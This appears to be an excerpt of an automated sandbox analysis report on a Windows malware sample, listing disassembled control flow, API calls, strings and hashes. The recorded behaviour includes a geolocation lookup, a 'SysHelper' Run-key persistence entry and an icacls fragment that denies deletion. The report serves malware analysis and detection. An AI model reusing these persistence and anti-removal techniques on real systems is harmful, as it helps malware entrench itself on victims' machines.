                • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                • "country_code":", xrefs: 0040CFE1
                • Microsoft Internet Explorer, xrefs: 0040CF5A
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Internet$CloseHandleOpen$FileRead_memset
                • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                • API String ID: 1485416377-2962370585
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 623 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->623 624 411e89-411e91 call 422587 621->624 633 411f36-411f38 623->633 634 411f3a-411f3f 623->634 624->623 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 641 411e52-411e57 631->641 632->631 639 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->639 640 411f40-411f49 634->640 635->636 636->629 653 411f98-411fa0 639->653 654 411fce-411fe9 639->654 640->640 644 411f4b-411f4d 640->644 645 411e59-411e5e 641->645 646 411e6a-411e6e 641->646 644->639 645->646 649 411e60-411e65 call 414690 645->649 646->610 651 411e74-411e77 646->651 649->646 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 661 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->661 662 412000-412009 657->662 663 411fbf-411fc9 call 415c10 658->663 665 411fb0-411fb9 659->665 671 4121d1-4121d5 661->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 661->672 662->662 667 41200b-41200d 662->667 663->654 665->665 669 411fbb-411fbd 665->669 667->661 669->663 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                APIs
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                • _memset.LIBCMT ref: 00411D3B
                • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                • GetCommandLineW.KERNEL32 ref: 00411EB4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                • UuidCreate.RPCRT4(?), ref: 00411EFC
                • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                • DeleteFileW.KERNEL32(?), ref: 00412036
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                • _memset.LIBCMT ref: 00412090
                • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                • lstrcatW.KERNEL32(?,?), ref: 004120C0
                • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                • lstrlenW.KERNEL32(?), ref: 004120D7
                • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                • _memset.LIBCMT ref: 00412120
                • SetLastError.KERNEL32(00000000), ref: 00412146
                • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                • lstrcatW.KERNEL32(?,?), ref: 0041216D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                • API String ID: 2589766509-1182136429
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

                Control-flow Graph

                APIs
                • GetCommandLineW.KERNEL32 ref: 00412235
                • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                • CloseHandle.KERNEL32(00000000), ref: 00412347
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                • API String ID: 3668891214-3807497772
                • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 984 4235a0 976->984 977->976 983 4235c0-4235c3 977->983 985 4235d7-4235dd 983->985 986 4235c5 983->986 991 4235a2-4235a8 984->991 989 4235e9 call 42fb64 985->989 990 4235df 985->990 987 4235c7-4235c9 986->987 988 4235cb-4235d5 call 425208 986->988 987->985 987->988 988->984 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1039 42368f-423696 1033->1039 1039->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                APIs
                • _memset.LIBCMT ref: 004235B1
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • __gmtime64_s.LIBCMT ref: 0042364A
                • __gmtime64_s.LIBCMT ref: 00423680
                • __gmtime64_s.LIBCMT ref: 0042369D
                • __allrem.LIBCMT ref: 004236F3
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                • __allrem.LIBCMT ref: 00423726
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                • __allrem.LIBCMT ref: 0042375B
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                • String ID:
                • API String ID: 1503770280-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1060 427b0b-427b1a call 427ad7 ExitProcess
                APIs
                • ___crtCorExitProcess.LIBCMT ref: 00427B11
                  • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                  • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                • ExitProcess.KERNEL32 ref: 00427B1A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess$AddressHandleModuleProc___crt
                • String ID: i;B
                • API String ID: 2427264223-472376889
                • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1063 42fb64-42fb77 call 428520 1066 42fba5-42fbaa call 428565 1063->1066 1067 42fb79-42fb8c call 428af7 1063->1067 1072 42fb99-42fba0 call 42fbab 1067->1072 1073 42fb8e call 42fe47 1067->1073 1072->1066 1076 42fb93 1073->1076 1076->1072
                APIs
                • __lock.LIBCMT ref: 0042FB7B
                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                • __tzset_nolock.LIBCMT ref: 0042FB8E
                  • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                  • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                  • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                  • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                  • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                  • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                • String ID:
                • API String ID: 1282695788-0
                • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1077 427f3d-427f47 call 427e0e 1079 427f4c-427f50 1077->1079
                APIs
                • _doexit.LIBCMT ref: 00427F47
                  • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Pointer$Decode$Encode$__lock_doexit
                • String ID:
                • API String ID: 2158581194-0
                • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1307 481920-4819e0 call 42f7c0 GetVersionExA LoadLibraryA * 3 1310 481a0b-481a0d 1307->1310 1311 4819e2-481a05 GetProcAddress * 2 1307->1311 1312 481aba-481ac2 1310->1312 1313 481a13-481a15 1310->1313 1311->1310 1315 481acb-481ad3 1312->1315 1316 481ac4-481ac5 FreeLibrary 1312->1316 1313->1312 1314 481a1b-481a31 1313->1314 1321 481a69-481a85 1314->1321 1322 481a33-481a5d call 42f7c0 call 45d550 1314->1322 1317 481b0d 1315->1317 1318 481ad5-481b0b GetProcAddress * 3 1315->1318 1316->1315 1320 481b0f-481b17 1317->1320 1318->1320 1323 481c0a-481c12 1320->1323 1324 481b1d-481b23 1320->1324 1321->1312 1338 481a87-481aae call 42f7c0 call 45d550 1321->1338 1322->1321 1326 481c1b-481c22 1323->1326 1327 481c14-481c15 FreeLibrary 1323->1327 1324->1323 1328 481b29-481b2b 1324->1328 1330 481c31-481c44 LoadLibraryA 1326->1330 1331 481c24-481c2b call 4549a0 1326->1331 1327->1326 1328->1323 1332 481b31-481b47 1328->1332 1336 481c4a-481c82 GetProcAddress * 3 1330->1336 1337 481d4b-481d53 1330->1337 1331->1330 1331->1337 1352 481b98-481bb4 1332->1352 1353 481b49-481b5d 1332->1353 1343 481caf-481cb7 1336->1343 1344 481c84-481cac call 42f7c0 call 45d550 1336->1344 1341 481d59-481e56 GetProcAddress * 12 1337->1341 1342 48223f-4822cd call 482470 GlobalMemoryStatus call 42f7c0 call 45d550 GetCurrentProcessId call 42f7c0 call 45d550 call 42a77e 1337->1342 1338->1312 1350 481e5c-481e63 1341->1350 1351 482233-482239 FreeLibrary 1341->1351 1347 481cb9-481cc0 1343->1347 1348 481d06-481d08 1343->1348 1344->1343 1357 481ccb-481ccd 1347->1357 1358 481cc2-481cc9 1347->1358 1355 481d0a-481d3c call 42f7c0 call 45d550 1348->1355 1356 481d3f-481d45 FreeLibrary 1348->1356 1350->1351 1360 481e69-481e70 1350->1360 1351->1342 1352->1323 1374 481bb6-481bca 1352->1374 1371 481b8a-481b8c 1353->1371 1372 481b5f-481b84 call 42f7c0 call 45d550 1353->1372 1355->1356 1356->1337 1357->1348 1364 481ccf-481cde 1357->1364 1358->1348 1358->1357 1360->1351 1367 481e76-481e7d 1360->1367 1364->1348 1386 481ce0-481d03 call 42f7c0 call 45d550 1364->1386 1367->1351 1376 481e83-481e8a 1367->1376 1371->1352 1372->1371 1394 481bfc-481bfe 1374->1394 1395 481bcc-481bf6 call 42f7c0 call 45d550 1374->1395 1376->1351 1382 481e90-481e97 1376->1382 1382->1351 1389 481e9d-481ea4 1382->1389 1386->1348 1389->1351 1390 481eaa-481eb1 1389->1390 1390->1351 1398 481eb7-481ebe 1390->1398 1394->1323 1395->1394 1398->1351 1404 481ec4-481ecb 1398->1404 1404->1351 1409 481ed1-481ed3 1404->1409 1409->1351 1413 481ed9-481eea 1409->1413 1413->1351 1416 481ef0-481f01 1413->1416 1417 481f03-481f0f GetTickCount 1416->1417 1418 481f15-481f22 1416->1418 1417->1418 1420 481f28-481f2d 1418->1420 1421 482081-482093 1418->1421 1424 481f33-481f9d call 42f7c0 call 45d550 1420->1424 1422 48209d-4820b2 1421->1422 1423 482095-482097 GetTickCount 1421->1423 1429 48210a-482116 1422->1429 1430 4820b4-4820f5 call 42f7c0 call 45d550 1422->1430 1423->1422 1440 481f9f-481faa 1424->1440 1441 482015-482060 1424->1441 1432 482118-48211a GetTickCount 1429->1432 1433 482120-482135 1429->1433 1430->1429 1452 4820f7-4820f9 1430->1452 1432->1433 1442 482196-4821a2 1433->1442 1443 482137 1433->1443 1445 481fb0-481feb call 42f7c0 call 45d550 1440->1445 1441->1421 1458 482062-482064 1441->1458 1446 4821ac-4821c1 1442->1446 1447 4821a4-4821a6 GetTickCount 1442->1447 1448 482140-482181 call 42f7c0 call 45d550 1443->1448 1476 481fed-481fef 1445->1476 1477 48200f 1445->1477 1460 482219-482227 1446->1460 1461 4821c3-482204 call 42f7c0 call 45d550 1446->1461 1447->1446 1448->1442 1475 482183-482185 1448->1475 1452->1430 1457 4820fb-482108 GetTickCount 1452->1457 1457->1429 1457->1430 1465 482079-48207b 1458->1465 1466 482066-482077 GetTickCount 1458->1466 1463 482229-48222b 1460->1463 1464 48222d CloseHandle 1460->1464 1461->1460 1483 482206-482208 1461->1483 1463->1351 1464->1351 1465->1421 1465->1424 1466->1421 1466->1465 1475->1448 1479 482187-482194 GetTickCount 1475->1479 1480 481ff1-482002 GetTickCount 1476->1480 1481 482004-48200d 1476->1481 1477->1441 1479->1442 1479->1448 1480->1477 1480->1481 1481->1445 1481->1477 1483->1461 1484 48220a-482217 GetTickCount 1483->1484 1484->1460 1484->1461
                APIs
                • GetVersionExA.KERNEL32(00000094), ref: 00481983
                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                • FreeLibrary.KERNEL32(?), ref: 00481AC5
                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                • FreeLibrary.KERNEL32(?), ref: 00481C15
                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                • FreeLibrary.KERNEL32(?), ref: 00481D45
                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                • GetTickCount.KERNEL32 ref: 00481F03
                • GetTickCount.KERNEL32 ref: 00481FF1
                • GetTickCount.KERNEL32 ref: 00482066
                • GetTickCount.KERNEL32 ref: 00482095
                • GetTickCount.KERNEL32 ref: 004820FB
                • GetTickCount.KERNEL32 ref: 00482118
                • GetTickCount.KERNEL32 ref: 00482187
                • GetTickCount.KERNEL32 ref: 004821A4
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CountTick$Library$Load$Free$Version
                • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                • API String ID: 842291066-1723836103
                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                APIs
                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                • __CxxThrowException@8.LIBCMT ref: 00411026
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                • __CxxThrowException@8.LIBCMT ref: 00411051
                • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                • __CxxThrowException@8.LIBCMT ref: 0041107A
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                • __CxxThrowException@8.LIBCMT ref: 004110AB
                • _memset.LIBCMT ref: 004110CA
